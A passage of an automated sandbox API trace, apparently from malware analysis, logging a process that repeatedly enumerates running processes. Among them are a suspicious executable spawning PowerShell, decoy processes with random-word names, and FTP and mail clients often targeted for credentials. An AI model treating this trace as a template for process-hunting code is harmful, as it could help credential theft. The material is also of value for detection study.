pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.912] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0219.954] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.956] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0219.958] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.959] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0219.961] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.963] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0219.964] CloseHandle (hObject=0x1eb8) returned 1 [0219.964] Sleep (dwMilliseconds=0x64) [0220.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0220.015] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.017] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.018] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.020] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.022] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.023] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.025] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.026] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.073] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.086] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.088] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.090] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.091] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.093] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.095] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.098] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.100] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.102] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.103] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.105] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.107] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0220.109] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.110] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0220.112] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.114] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0220.118] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0220.120] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0220.122] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0220.174] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.178] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0220.180] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.182] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.183] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0220.185] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.186] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0220.188] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.194] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0220.225] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0220.227] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0220.228] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0220.230] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0220.231] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0220.233] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0220.237] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0220.238] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0220.241] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0220.242] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0220.245] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0220.247] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0220.249] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0220.305] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0220.307] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0220.308] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0220.310] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0220.312] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0220.314] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0220.315] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0220.317] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0220.319] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0220.321] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0220.323] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0220.325] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0220.327] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0220.329] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0220.331] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0220.333] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0220.335] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0220.337] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0220.339] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0220.381] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0220.383] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0220.385] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0220.387] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0220.389] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0220.391] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, 